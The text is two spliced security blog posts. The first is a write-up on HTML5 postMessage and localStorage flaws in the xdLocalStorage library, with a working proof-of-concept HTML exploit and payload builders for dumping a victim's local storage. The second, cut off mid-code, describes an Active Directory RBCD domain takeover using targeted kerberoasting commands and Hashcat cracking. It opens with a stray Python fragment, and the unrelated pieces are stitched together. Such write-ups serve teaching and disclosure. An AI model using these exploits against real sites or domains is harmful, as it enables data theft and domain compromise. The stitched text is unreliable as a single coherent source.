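    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)

def same_origin(a: str, b: str) -> bool:
    return origin_tuple(a) == origin_tuple(b)
```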

    HTML5

    HTML5 was first released in 2008 (and has since been superseded by the "HTML Living Standard"); it introduced a range of new features, including "Web Storage" and "Web Messaging".

    Web Storage

    Web storage allows applications to store data locally within the user's browser as strings in key/value pairs; significantly more data can be stored than in cookies.

    There are two types: local storage (localStorage) and session storage (sessionStorage). The first stores the data with no expiration, whereas the second keeps it only for that session (closing the browser tab loses the data).

    There are several security considerations when utilising web storage; as might be expected, these concern access to the data. Access to web storage is restricted to the same origin.

    DNS Spoofing Attacks

    If an attacker successfully performs a DNS spoofing attack, the user’s browser will connect to the attacker’s web server and treat all responses and content as if it came from the legitimate domain (which has been spoofed). This means that the attacker will then have access to the contents of web storage and can read and manipulate it as the origin will match. In order to prevent this, it is critical that all applications are served over a secure HTTPS connection that utilise valid TLS certificates and HSTS to prevent a connection being established to a malicious server.

    Cross Directory Attacks

    Applications that are deployed to different paths within a domain usually have the same origin (i.e. the same scheme, domain/host, and port) as each other. This means that JavaScript in one application can manipulate the contents of other applications within the same origin, which is a common concern for Cross Site Scripting vulnerabilities. However, what may be overlooked is that sites with the same origin also share the same web storage objects, potentially exposing sensitive data set by one application to an attacker gaining access to another. It is therefore recommended that applications deployed in this manner avoid utilising web storage.

    A note to testers

    Web storage is read and manipulated via JavaScript functions in the user’s browser, therefore you will not see much evidence of its use in your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can utilise the developer tools in the browser to view the contents of local storage and session storage or use the developer console to execute JavaScript and access the data.

    For further information about web storage refer to the specification.
    For further information about using web storage safely refer to the OWASP HTML5 Security Cheat Sheet.

    Web Messaging (AKA cross-document messaging AKA postMessage)

    For security and privacy reasons web browsers prevent documents in different origins from affecting each other. This is a critical security feature that stops malicious sites from reading data belonging to other origins the user may have accessed with the same browser, or from executing JavaScript within the context of another origin.

    However sometimes an application has a legitimate need to communicate with another application within the user’s browser. For example an organisation may own several domains and need to pass information about the user between them. One technique that was used to achieve this was JSONP which I have blogged about previously.

    The HTML Standard has introduced a messaging system that allows documents to communicate with each other regardless of their source origin in order to meet this requirement without enabling Cross Site Scripting attacks.

    Document “A” can create an iframe (or open a window) that contains document “B”.
    Document “A” can then call the postMessage() method on the Window object of document “B” to trigger a message event and pass information from “A” to “B”.
    Document “B” can also use the postMessage() method on the window.parent or window.opener object to send a message to the document that opened it (in this example document “A”).

    Messages can be structured objects, e.g. nested objects and arrays, can contain JavaScript values (String, Number, Date objects, etc.), and can contain certain data objects such as File, Blob, FileList, and ArrayBuffer objects.

    I have most commonly seen messages consisting of strings containing JSON. i.e. the sender uses JSON.stringify(data) and the receiver uses data = JSON.parse(event.data).

    Note that an HTML postMessage is completely different from an HTTP POST message!

    Note Cross-Origin Resource Sharing (CORS) can also be used to allow a web application running at one origin to access selected resources from a different origin, however that is not the focus of this post. Refer to the article from Mozilla for further information about CORS.

    Receiving a message

    In order to receive messages an event handler must be registered for incoming events. For example the addEventListener() method (often on the window) might be used to specify a function which should be called when events of type 'message' are fired.

    It is the developer’s responsibility to check the origin attribute of any messages received to ensure that they only accept messages from origins they expect.

    It is not uncommon to encounter message handling functions that are not performing any origin validation at all. However even when origin validation is attempted it is often insufficiently robust. For example (assuming the developer intended to allow messages from https://www.example.com):

    • Regular expressions which do not escape the . character (which matches any character) in domain names.
      e.g. https://wwwXexample.com is a valid domain name that could be registered by an attacker and would pass the following:
      var regex = /https*:\/\/www.example.com$/i; if (regex.test(event.origin)) {//accepted}
    • Regular expressions which do not anchor the end of the string by using the $ character at the end of the expression.
      e.g. https://www.example.com.grimhacker.com is a valid domain that could be under the attacker’s control and would pass the following:
      var regex = /https*:\/\/www\.example\.com/i; if (regex.test(event.origin)) {//accepted}
    • Using indexOf to verify the origin contains the expected domain name, without accounting for the entire origin. e.g. https://www.example.com.grimhacker.com would pass the following check: if (event.origin.indexOf("https://www.example.com") > -1) {//accepted}
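    The difference between these flawed checks and a robust one can be demonstrated with plain JavaScript (a sketch, reusing the https://www.example.com origin from the examples above):

```javascript
// A loose regex with an unescaped "." and no "$" anchor, as in the
// flawed examples above.
var looseRegex = /https*:\/\/www.example.com/i;

// Robust alternative: exact string comparison against a whitelist of
// full origins (scheme, host and, if non-default, port).
var ALLOWED_ORIGINS = ["https://www.example.com"];
function isAllowedOrigin(origin) {
  return ALLOWED_ORIGINS.indexOf(origin) !== -1;
}

// Attacker-registerable domains slip past the loose regex...
console.log(looseRegex.test("https://wwwXexample.com"));                // true
console.log(looseRegex.test("https://www.example.com.grimhacker.com")); // true

// ...but not past exact comparison.
console.log(isAllowedOrigin("https://wwwXexample.com"));                // false
console.log(isAllowedOrigin("https://www.example.com.grimhacker.com")); // false
console.log(isAllowedOrigin("https://www.example.com"));                // true
```

    Exact comparison has the added benefit that there is nothing to escape or anchor, so there is nothing to get wrong.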

    Even when robust origin validation is performed, the application must still perform input validation on the data received to ensure it is in the expected format before utilising it. The application must treat the message as data rather than evaluating it as code (e.g. via eval()), and avoid inserting it into the DOM (e.g. via innerHTML). This is because any vulnerability (such as Cross Site Scripting) in an allowed domain may give an attacker the opportunity to send malicious messages from the trusted origin, which may compromise the receiving application.

    The impact of a malicious message being processed depends on how the vulnerable application processes the data sent; however, DOM Based Cross Site Scripting is common.

    Sending a message

    When sending a message using the postMessage() method of a window the developer has the option of specifying the targetOrigin of the message, either as a parameter or within the object passed in the options parameter. If the targetOrigin is not specified it defaults to "/", which restricts the message to same-origin targets only. It is possible to use the wildcard * to allow any origin to receive the message.

    It is important to ensure that messages include a specific targetOrigin, particularly when the message contains sensitive information.

    It may be tempting for developers to use the wildcard if they have created the window object since it is easy to assume that the document within the window must be the one they intend to communicate with, however if the location of that window has changed since it was created the message will be sent to the new location, which may not be an origin which was ever intended.

    Likewise a developer may be tempted to use the wildcard when sending a message to window.parent, as they believe only legitimate domains can/will be the parent frame/window. This is often not the case and a malicious domain can open a window to the vulnerable application and wait to receive sensitive information via a message.
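    One defensive pattern against both mistakes is to refuse to send at all unless an explicit targetOrigin has been supplied. The wrapper below is a hypothetical sketch, not part of any library:

```javascript
// Hypothetical guard around window.postMessage: throws rather than
// falling back to the wildcard "*" targetOrigin.
function safePostMessage(targetWindow, data, targetOrigin) {
  if (!targetOrigin || targetOrigin === "*") {
    throw new Error("Refusing to postMessage without an explicit targetOrigin");
  }
  // If the document in targetWindow has since navigated away from
  // targetOrigin, the browser will drop the message instead of
  // delivering it to the new (possibly malicious) document.
  targetWindow.postMessage(JSON.stringify(data), targetOrigin);
}

// Usage, with a stub window object so this also runs outside a browser:
var sent = [];
var fakeWindow = {
  postMessage: function (msg, origin) { sent.push({ msg: msg, origin: origin }); }
};
safePostMessage(fakeWindow, { secret: "value" }, "https://www.example.com");
```

    With this in place a navigated or attacker-controlled window never receives the message, because the browser enforces the stated targetOrigin at delivery time.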

    A note to testers

    Web messages are entirely within the user’s browser, therefore you will not see any evidence of them within your intercepting proxy (unless you closely review all JavaScript loaded by the application).

    You can check for registered message handlers in the “Global Listeners” section of the debugger pane in the Sources tab of the Chrome developer tools:

    Press F12 to open developer tools, click the "Sources" tab, on the debugger pane click "Global Listeners", and expand the "message" section to show message handlers.

    You can use the monitorEvents() console command in the chrome developer tools to print messages to the console. e.g. to monitor message events sent from or received by the window: monitorEvents(window, "message").

    Note that you are likely to miss messages that are sent as soon as the page loads using this method as you will not have had the opportunity to start monitoring. Additionally although this will capture messages sent and received to nested iframes in the same window, it will not capture messages sent to another window.
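    One workaround is to register your own logging listener, either via the console or injected before the page's scripts run. The makeMessageLogger helper below is hypothetical, for illustration; only the registration line needs a browser, the collection logic is plain JavaScript:

```javascript
// Hypothetical helper: returns a listener that records every message
// event (origin and data) into the supplied array for later inspection.
// In a browser you would register it as early as possible, e.g.:
//   var captured = [];
//   window.addEventListener('message', makeMessageLogger(captured), false);
function makeMessageLogger(sink) {
  return function (event) {
    sink.push({ origin: event.origin, data: event.data });
  };
}

// Simulating two incoming message events (stub objects, no browser needed):
var captured = [];
var logger = makeMessageLogger(captured);
logger({ origin: "https://siteb.example", data: '{"id":"iframe-ready"}' });
logger({ origin: "https://sitea.example", data: '{"id":1,"action":"get"}' });
```

    Note this still misses any messages delivered before the listener is registered, which is why dedicated hooking tools such as PMHook exist.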

    The most robust method I know of for capturing postMessages is the PMHook tool from AppCheck; usage of this tool is described in their Hunting HTML5 postMessage Vulnerabilities paper.

    Once you have captured a message, can reproduce it, and have found the handler function, you will want to set breakpoints in the handler function in order to step through the code and identify issues in the handling of messages. The following resource from Google provides an introduction to using the developer tools in Chrome: https://developers.google.com/web/tools/chrome-devtools/javascript

    For further information about web messaging refer to the specification.
    For further information about safely using web messaging refer to the OWASP HTML5 Security Cheat Sheet.
    For more in depth information regarding finding and exploiting vulnerabilities in web messages I recommend the paper Hunting HTML5 postMessage Vulnerabilities from Sec-1/AppCheck.

    The Vulnerability in xdLocalStorage

    Normal Operation Walk Through

    Normal usage of the xdLocalStorage library (according to the README) is to create an HTML document which imports xdLocalStoragePostMessageApi.min.js on the domain that will store the data – this is the “magical iframe” – and to import xdLocalStorage.min.js on the “client page” which needs to manipulate the data. Note that Angular applications can instead import ng-xdLocalStorage.min.js and inject the xdLocalStorage module where required to use the API.

    The client

    The interface is initialised on the client page with the URL of the “magical iframe” after which the setItem(), getItem(), removeItem(), key(), and clear() API functions can be called to interact with the local storage of the domain hosting the “magical iframe”.

    When the library initialises on the client page it appends an iframe to the body of the page which loads the “magical iframe” document. It also registers an event handler using addEventListener or attachEvent (depending on browser capabilities). The init function is included below (line 56 of xdLocalStorage.js):

      function init(customOptions) {
        options = XdUtils.extend(customOptions, options);
        var temp = document.createElement('div');
    
        if (window.addEventListener) {
          window.addEventListener('message', receiveMessage, false);
        } else {
          window.attachEvent('onmessage', receiveMessage);
        }
    
        temp.innerHTML = '<iframe id="' + options.iframeId + '" src="' + options.iframeUrl + '" style="display: none;"></iframe>';
        document.body.appendChild(temp);
        iframe = document.getElementById(options.iframeId);
      }

    When the client page calls one of the API functions it must supply any required parameters (e.g. getItem() requires that the key name is specified), and a callback function. The API function calls the buildMessage() function passing an appropriate action string for itself, along with the parameters and callback function. The getItem() API function is included below as an example (line 125 of xdLocalStorage.js):

        getItem: function (key, callback) {
          if (!isApiReady()) {
            return;
          }
          buildMessage('get', key,  null, callback);
        },

    The buildMessage() function increments a requestId and stores the callback associated with this requestId. It then creates a data object containing a namespace, the requestId, the action to be performed (e.g. getItem() causes a "get" action), key name, and value. This data is converted to a string and sent as a postMessage to the “magical iframe”. The buildMessage() function is included below (line 43 in xdLocalStorage.js):

    function buildMessage(action, key, value, callback) {
        requestId++;
        requests[requestId] = callback;
        var data = {
          namespace: MESSAGE_NAMESPACE,
          id: requestId,
          action: action,
          key: key,
          value: value
        };
        iframe.contentWindow.postMessage(JSON.stringify(data), '*');
      }

    The “magical iframe”

    When the document is loaded a handler function is attached to the window (using either addEventListener() or attachEvent() depending on browser support) as shown below (line 90 in xdLocalStoragePostMessageApi.js):

      if (window.addEventListener) {
        window.addEventListener('message', receiveMessage, false);
      } else {
        window.attachEvent('onmessage', receiveMessage);
      }

    It then sends a message to the parent window to indicate it is ready (line 96 in xdLocalStoragePostMessageApi.js):

      function sendOnLoad() {
        var data = {
          namespace: MESSAGE_NAMESPACE,
          id: 'iframe-ready'
        };
        parent.postMessage(JSON.stringify(data), '*');
      }
      //on creation
      sendOnLoad();

    When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. It will then call the required function based on the value of the data.action attribute, for example "get" results in a call to getData() which is passed the data.key attribute. The receiveMessage() function is included below (line 63 of xdLocalStoragePostMessageApi.js):

      function receiveMessage(event) {
        var data;
        try {
          data = JSON.parse(event.data);
        } catch (err) {
          //not our message, can ignore
        }
    
        if (data && data.namespace === MESSAGE_NAMESPACE) {
          if (data.action === 'set') {
            setData(data.id, data.key, data.value);
          } else if (data.action === 'get') {
            getData(data.id, data.key);
          } else if (data.action === 'remove') {
            removeData(data.id, data.key);
          } else if (data.action === 'key') {
            getKey(data.id, data.key);
          } else if (data.action === 'size') {
            getSize(data.id);
          } else if (data.action === 'length') {
            getLength(data.id);
          } else if (data.action === 'clear') {
            clear(data.id);
          }
        }
      }

    The selected function will then directly interact with the localStorage object to carry out the requested action and call the postData() function to send the data back to the parent window. To illustrate this the getData() and postData() functions are shown below (respectively lines 20 and 14 in xdLocalStoragePostMessageApi.js):

      function getData(id, key) {
        var value = localStorage.getItem(key);
        var data = {
          key: key,
          value: value
        };
        postData(id, data);
      }
      function postData(id, data) {
        var mergedData = XdUtils.extend(data, defaultData);
        mergedData.id = id;
        parent.postMessage(JSON.stringify(mergedData), '*');
      }

    The client

    When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. If the data.id attribute is "iframe-ready" then the initCallback() function is executed (if one has been configured), otherwise the data object is passed to the applyCallback() function. This is shown below (line 26 of xdLocalStorage.js):

      function receiveMessage(event) {
        var data;
        try {
          data = JSON.parse(event.data);
        } catch (err) {
          //not our message, can ignore
        }
        if (data && data.namespace === MESSAGE_NAMESPACE) {
          if (data.id === 'iframe-ready') {
            iframeReady = true;
            options.initCallback();
          } else {
            applyCallback(data);
          }
        }
      }

    The applyCallback() function simply uses the data.id attribute to find the callback function that was stored for the matching requestId and executes it, passing it the data. This is shown below (line 19 of xdLocalStorage.js):

      function applyCallback(data) {
        if (requests[data.id]) {
          requests[data.id](data);
          delete requests[data.id];
        }
      }

    Visual Example

    The sequence diagram shows (at a very high level) the interaction between the client (SiteA) and the “magical iframe” (SiteB) when the getItem function is called:

    1. SiteA loads SiteB in an iframe.
    2. SiteB sends an "iframe-ready" message to SiteA.
    3. getItem is called by SiteA, which causes SiteA to send a "get" action message to SiteB and store a callback function alongside the requestId.
    4. SiteB gets the requested key value from local storage.
    5. SiteB sends the key/value to SiteA in a postMessage.
    6. SiteA executes the callback for the matching requestId and passes it the data.

    The Vulnerabilities

    Missing origin validation when receiving messages

    Magic iframe – CVE-2015-9544

    The receiveMessage() function in xdLocalStoragePostMessageApi.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the action attribute is one of the following strings: "set", "get", "remove", "key", "size", "length", or "clear".

    Therefore a malicious domain can send a message that meets these requirements and manipulate the local storage of the domain hosting the “magical iframe”.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe”.

    The following proof of concept allows the user to set a value for “pockey” in the local storage of the domain hosting the vulnerable “magic iframe”. However it would also be possible to retrieve all information from local storage and send this to the attacker, by exploiting this issue in combination with the use of a wildcard targetOrigin (discussed below).

    <html>
    	<!-- POC exploit for xdLocalStorage.js by GrimHacker https://grimhacker.com/exploiting-xdlocalstorage-(localstorage-and-postmessage) -->
    	<body>
    		<script>
    			var MESSAGE_NAMESPACE = "cross-domain-local-message";
    			var targetSite = "http://siteb.grimhacker.com:8000/cross-domain-local-storage.html"; // magical iframe
    			
    			var iframeId = "vulnerablesite";
    			var a = document.createElement("a");
    			a.href = targetSite;
    			var targetOrigin = a.origin;
    			
    			function receiveMessage(event) {
    				var data;
    				data = JSON.parse(event.data);
    				var message = document.getElementById("message");
    				message.textContent = "My Origin: " + window.origin + "\r\nevent.origin: " + event.origin + "\r\nevent.data: " + event.data;
    			}
    			
    			window.addEventListener('message', receiveMessage, false);
    
    			var temp = document.createElement('div');
    			temp.innerHTML = '<iframe id="' + iframeId + '" src="' + targetSite + '" style="display: none;"></iframe>';
    			document.body.appendChild(temp);
    			iframe = document.getElementById(iframeId);
    
    			function setValue() {
    				var valueInput = document.getElementById("valueInput");
    				var data = {
    					namespace: MESSAGE_NAMESPACE,
    					id: 1,
    					action: "set",
    					key: "pockey",
    					value: valueInput.value
    				}
    				iframe.contentWindow.postMessage(JSON.stringify(data), targetOrigin);
    			}
    		</script>
    		<div class=label>Enter a value to assign to "pockey" on the vulnerable target:</div><input id=valueInput>
    		<button onclick=setValue()>Set pockey</button>
    		<div><p>The latest postMessage received will be shown below:</p></div>
    		<div id="message" style="white-space: pre;"></div>
    		</body>
    </html>

    The screenshots below demonstrate this:

    SiteA loads an iframe for cross-domain-local-storage.html on SiteB and receives an “iframe-ready” postMessage.
    SiteA sends a postMessage to the SiteB iframe to set the key “pockey” with the specified value “pocvalue” in the SiteB local storage. SiteB sends a postMessage to SiteA to indicate success.
    Checking the local storage for SiteB shows the key and value have been set.

    Depending on how the local storage data is used by legitimate client application, altering the data as shown above may impact the security of the client application.

    Client – CVE-2015-9545

    The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the data.namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the data.id attribute of the message matches a requestId that is currently pending.

    Therefore a malicious domain can send a message that meets these requirements and cause their malicious data to be processed by the callback configured by the vulnerable application. Note that requestId is a number that increments with each legitimate request the vulnerable application sends to the “magic iframe”, therefore exploitation would include winning a race condition.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate client site. Exact exploitation of this issue would depend on how the vulnerable application uses the data they intended to retrieve from local storage, analysis of the functionality would be required in order to identify a valid attack vector.
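    To make the race condition concrete: because requestId is just an incrementing number, an attacker's page can spray spoofed responses covering a range of plausible ids and hope one matches a pending callback. A sketch of the payload construction (the namespace is the library default; the key/value content is whatever the attacker wants the stored callback to process):

```javascript
var MESSAGE_NAMESPACE = "cross-domain-local-message";

// Build spoofed "responses" for requestIds 1..maxId; in the attacker's
// page each one would be sent with victimWindow.postMessage(payload, "*").
function buildSpoofedResponses(maxId, key, value) {
  var payloads = [];
  for (var id = 1; id <= maxId; id++) {
    payloads.push(JSON.stringify({
      namespace: MESSAGE_NAMESPACE,
      id: id,
      key: key,
      value: value // attacker-controlled data handed to the stored callback
    }));
  }
  return payloads;
}

var payloads = buildSpoofedResponses(50, "sessionData", "attacker-value");
```

    Whichever payload arrives first with a pending id wins the race; the legitimate response from the “magic iframe” is then discarded because applyCallback() deletes the callback after the first use.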

    Wildcard targetOrigin when sending messages

    Magic iframe – CVE-2020-11610

    The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the “magical iframe” and receive the messages that the “magical iframe” sends.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe” and receives any messages it sends as a result of the interaction.

    Note that this issue can be combined with the lack of origin validation to recover all information from local storage. An attacker could first retrieve the length of local storage and then iterate through each key index and the “magical iframe” would send the key and value to the parent, which in this case would be the attacker’s domain.
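    The dump described above amounts to the following sequence of messages from the attacker's page to the “magical iframe” (a sketch; the action names are taken from the receiveMessage() dispatch shown earlier):

```javascript
var MESSAGE_NAMESPACE = "cross-domain-local-message";

function buildRequest(id, action, key) {
  return JSON.stringify({ namespace: MESSAGE_NAMESPACE, id: id, action: action, key: key });
}

// Step 1: ask how many entries the victim's local storage holds.
var lengthRequest = buildRequest(1, "length");

// Step 2: once the length (say n) arrives, request the key name at each
// index; the values can then be fetched with "get" requests per key name.
// Because postData() uses the wildcard targetOrigin, every reply lands in
// the attacker's (parent) page.
function buildKeyRequests(n) {
  var requests = [];
  for (var i = 0; i < n; i++) {
    requests.push(buildRequest(2 + i, "key", i));
  }
  return requests;
}

var keyRequests = buildKeyRequests(3);
```

    In the attacker's page each payload would be sent with iframe.contentWindow.postMessage(payload, "*"), exactly as the library's own client does.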

    Client – CVE-2020-11611

    The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends.

    In order to exploit this issue an attacker would need to redirect the “magical iframe” loaded on the vulnerable application within the user’s browser to a domain they control. This is non-trivial but there may be some scenarios where it can occur.

    If an attacker were able to successfully exploit this issue they would have access to any information that the client sends to the iframe, and also be able to send messages back with a valid requestId which would then be processed by the client, this may then further impact the security of the client application.

    How Wide Spread is the Issue in xdLocalStorage?

    At the time of writing all versions of xdLocalStorage (previously called cross-domain-local-storage) are vulnerable – i.e. release 1.0.1 (released 2014-04-17) to 2.0.5 (released 2017-04-14).

    According to the project README the recommended method of installing is via bower or npm. npmjs.com shows that the library has around 350 weekly downloads (March 2020).

    Defence

    xdLocalStorage

    This issue has been known since at least August 2015 when Hengjie opened an Issue on the GitHub repository to notify the project owner (https://github.com/ofirdagan/cross-domain-local-storage/issues/17). However the Pull request which included functionality to whitelist origins has not been accepted or worked on since July 2016 (https://github.com/ofirdagan/cross-domain-local-storage/pull/19). The last commit on the project (at the time of writing) was in August 2018. Therefore a fix from the project maintainer may not be forthcoming.

    Consider replacing this library with a maintained alternative which includes robust origin validation, or implement validation within the existing library.
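    Pending a maintained fix, origin validation can be bolted on in front of the library's existing handlers. The function below is a hypothetical sketch (allowedOrigins would be configured per deployment):

```javascript
// Drop messages from unexpected origins before any parsing or action
// dispatch takes place.
function withOriginCheck(allowedOrigins, handler) {
  return function (event) {
    if (allowedOrigins.indexOf(event.origin) === -1) {
      return; // silently ignore untrusted origins
    }
    handler(event);
  };
}

// In the “magical iframe” this would replace the direct registration:
//   window.addEventListener('message',
//     withOriginCheck(["https://client.example.com"], receiveMessage), false);

// Demonstration with stub events (no browser needed):
var handled = [];
var guarded = withOriginCheck(["https://client.example.com"], function (e) {
  handled.push(e.data);
});
guarded({ origin: "https://evil.example.net", data: "dropped" });
guarded({ origin: "https://client.example.com", data: "processed" });
```

    Wrapping the handler rather than editing it keeps the patch small and leaves the library's own dispatch logic untouched.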

    Web Messaging

    • Refer to the OWASP HTML 5 Security Cheat Sheet.
    • When sending a message explicitly state the targetOrigin (do not use the wildcard *)
    • When receiving a message carefully validate the origin of any message to ensure it is from an expected source.
    • When receiving a message carefully validate the data to ensure it is in the expected format and safe to use in the context it is in (e.g. HTML markup within the data may not be safe to embed directly into the page as this would introduce DOM Based Cross Site Scripting).

    Web Storage

     

    Sursa: https://grimhacker.com/2020/04/02/exploiting-xdlocalstorage-localstorage-and-postmessage/

  17. Chaining multiple techniques and tools for domain takeover using RBCD

    Reading time ~26 min
    Posted by Sergio Lazaro on 09 March 2020

    Intro

    In this blog post I want to show a simulation of a real-world Resource Based Constrained Delegation attack scenario that could be used to escalate privileges on an Active Directory domain.

    I recently faced a network that had had several assessments done before. Luckily for me, before this engagement I had used some of my research time to understand more advanced Active Directory attack concepts. This blog post isn’t new and I used lots of existing tools to perform the attack. Worse, there are easier ways to do it as well. But, this assessment required different approaches and I wanted to show defenders and attackers that if you understand the concepts you can take more than one path.

    The core of the attack is about abusing resource-based constrained delegation (RBCD) in Active Directory (AD). Last year, Elad Shamir wrote a great blog post explaining how the attack works and how it can result in a Discretionary Access Control List (DACL)-based computer object takeover primitive. In line with this research, Andrew Robbins and Will Schroeder presented DACL-based attacks at Black Hat back in 2017 that you can read here.

    To test the attacks I created a typical client network using an AWS Domain Controller (DC) with some supporting infrastructure. This also served as a nice addition to our Infrastructure Training at SensePost by expanding the modern AD attack section and practicals. We’ll be giving this at BlackHat USA. The attack is demonstrated against my practice environment.

    Starting Point

    After some time on the network, I was able to collect local and domain credentials that I used in further lateral movement. However, I wasn’t lucky enough to compromise credentials for users that were part of the Domain Admins group. Using BloodHound, I realised that I had compromised two privileged groups with the credentials I gathered: RMTAdmins and MGMTAdmins.

    The users from those groups that will be used throughout the blogpost are:

    1. RONALD.MGMT (cleartext credentials) (Member of MGMTAdmins)
    2. SVCRDM (NTLM hash) (Member of RMTADMINS)

    One – The user RONALD.MGMT was configured with interesting write privileges on a user object. If the user was compromised, the privileges obtained would create the opportunity to start a chain of attacks due to DACL misconfigurations on multiple users. To show you a visualisation, BloodHound looked as follows:

    Figure 1 – DACL attack path from RONALD.MGMT to SVCSYNC user.

    According to Figure 1, the SVCSYNC user was marked as a high value target. This is important since this user was able to perform a DCSync (due to the GetChanges & GetChangesAll privileges) on the main domain object:

    Figure 2 – SVCSYNC had sufficient privileges on the domain object to perform a DCSync.

    Two – The second user, SVCRDM, was part of a privileged group able to change the owner of a DC computer due to the WriteOwner privilege. The privileges the group had were applied to all the members, effectively granting SVCRDM the WriteOwner privilege. BloodHound showed this relationship as follows:

    Figure 3 – SVCRDM user, member of RMTADMINS, had WriteOwner privileges over the main DC.

    With the two graphs BloodHound presented, there were two different approaches to compromising the domain:

    1. Perform a chain of targeted kerberoasting attacks to compromise the SVCSYNC user and then perform a DCSync.
    2. Abuse the RBCD attack primitive to compromise the DC computer object.

    Targeted Kerberoasting

    There are two ways to compromise a user object when we have write privileges (GenericWrite/GenericAll/WriteDacl/WriteOwner) on the object: we can force a password reset or we can rely on the targeted kerberoasting technique. For obvious reasons, forcing a password reset on these users wasn’t an option. The only option to compromise the users was a chain of targeted kerberoasting attacks to finally reach the high value target SVCSYNC.

    Harmj0y described the targeted kerberoasting technique in a blog post he wrote while developing BloodHound with _wald0 and @cptjesus. Basically, when we have write privileges on a user object, we can add the Service Principal Name (SPN) attribute and set it to whatever we want. Then kerberoast the ticket and crack it using John/Hashcat. Later, we can remove the attribute to clean up the changes we made.

    There are a lot of ways to perform this attack. Probably the easiest way is using PowerView. However, I chose to use Powershell’s ActiveDirectory module and impacket.

    According to Figure 2, my first target was SUSANK on the road to SVCSYNC. Since I had the credentials of RONALD.MGMT I could use Runas on my VM to spawn a PowerShell command line using RONALD.MGMT’s credentials:

    runas /netonly /user:ronald.mgmt@maemo.local powershell

    Runas is really useful as it spawns a CMD using the credentials of a domain user from a machine which isn’t part of the domain. The only requirement is that DNS resolves correctly. The /netonly flag is important because the provided credentials will only be used when network resources are accessed.

    Figure 4 – Spawning PowerShell using Runas with RONALD.MGMT credentials.

    In the new PowerShell terminal, I loaded the ActiveDirectory PowerShell module to perform the targeted kerberoast on the user I was interested in (SUSANK in this case). Below are the commands used to add a new SPN to the account:

    Import-Module ActiveDirectory
    Get-ADUser susank -Server MAEMODC01.maemo.local
    Set-ADUser susank -ServicePrincipalNames @{Add="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local
    Figure 5 – Targeted kerberoast using the ActiveDirectory PowerShell module.

    After a new SPN is added, we can use impacket’s GetUserSPNs to retrieve Ticket Granting Service Tickets (TGS) as usual:

    Figure 6 – Impacket’s GetUserSPNs was used to request the Ticket-Granting-Service (TGS) of every SPN.

    In the lab there weren’t any other SPNs configured, although in the real world there are likely to be more. TGS tickets can be cracked because portions of the ticket are encrypted using the target user’s Kerberos 5 TGS-REP etype 23 hash as the key, making it possible to obtain the cleartext password of the target account in an offline brute force attack. In this case, I used Hashcat:

    Figure 7 – The TGS obtained before was successfully cracked using Hashcat.

    Once the user SUSANK was compromised, I repeated the same process with the other users in order to reach the high value target SVCSYNC. However, I had no luck when I did the targeted kerberoasting attack and tried to crack the tickets of PIERREQA and JUSTINC users, both necessary steps in the path. Thus, I had to stop following this attack path.

    However, having the ability to add the serviceprincipalname attribute to a user was really important in order to compromise the DC later by abusing the RBCD computer object primitive. Keep this in mind as we’ll come back later to SUSANK.

    Resource-based Constrained Delegation (RBCD)

    I’m not going to dig into all of the details on how a RBCD attack works. Elad wrote a really good blog post called “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory” that explains all the concepts I’m going to use. If you haven’t read it, I suggest you stop here and spend some time trying to understand all the requirements and concepts he explained. It’s a long blog post, so grab some coffee ;)

    As a TL;DR, I’ll list the main concepts you’ll need to know to spot and abuse Elad’s attack:

    1. Owning an SPN is required. This can be obtained by setting the serviceprincipalname attribute on a user object when we have write privileges. Another approach relies on abusing the domain’s MachineAccountQuota to create a computer account, which by default comes with the serviceprincipalname attribute set.
    2. Write privileges on the targeted computer object are required. These privileges will be used to configure the RBCD on the computer object and the user with the serviceprincipalname attribute set.
    3. The RBCD attack involves three steps: request a TGT, S4U2Self and S4U2Proxy.
    4. S4U2Self works on any account that has the serviceprincipalname attribute set.
    5. S4U2Self allows us to obtain a valid TGS for arbitrary users (including sensitive users such as Domain Admins group members).
    6. S4U2Proxy always produces a forwardable TGS, even if the TGS used isn’t forwardable.
    7. We can use Rubeus to perform the RBCD attack with a single command.
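
    The list above can be condensed into a toy model of the ticket flow. This is a conceptual sketch only, not real Kerberos (there is no KDC, encryption, or PAC here); the names `Ticket`, `s4u2self` and `s4u2proxy` are illustrative and not part of any library:

    ```python
    # Toy model of the RBCD ticket flow: TGT -> S4U2Self -> S4U2Proxy.
    from dataclasses import dataclass

    @dataclass
    class Ticket:
        client: str          # who the ticket identifies
        service: str         # SPN the ticket is valid for
        forwardable: bool

    def s4u2self(tgt: Ticket, impersonated_user: str) -> Ticket:
        """Any account with an SPN can request a TGS to itself on behalf
        of an arbitrary user (points 4 and 5 above). Without protocol
        transition configured, the resulting TGS is NOT forwardable."""
        return Ticket(client=impersonated_user, service=tgt.client, forwardable=False)

    def s4u2proxy(tgs: Ticket, target_spn: str) -> Ticket:
        """With RBCD configured on the target, S4U2Proxy accepts even a
        non-forwardable TGS and always emits a forwardable one (point 6)."""
        return Ticket(client=tgs.client, service=target_spn, forwardable=True)

    # Walk the chain as SUSANK impersonating RYAN.DA against the DC's CIFS service:
    tgt = Ticket(client="susank", service="krbtgt/maemo.local", forwardable=True)
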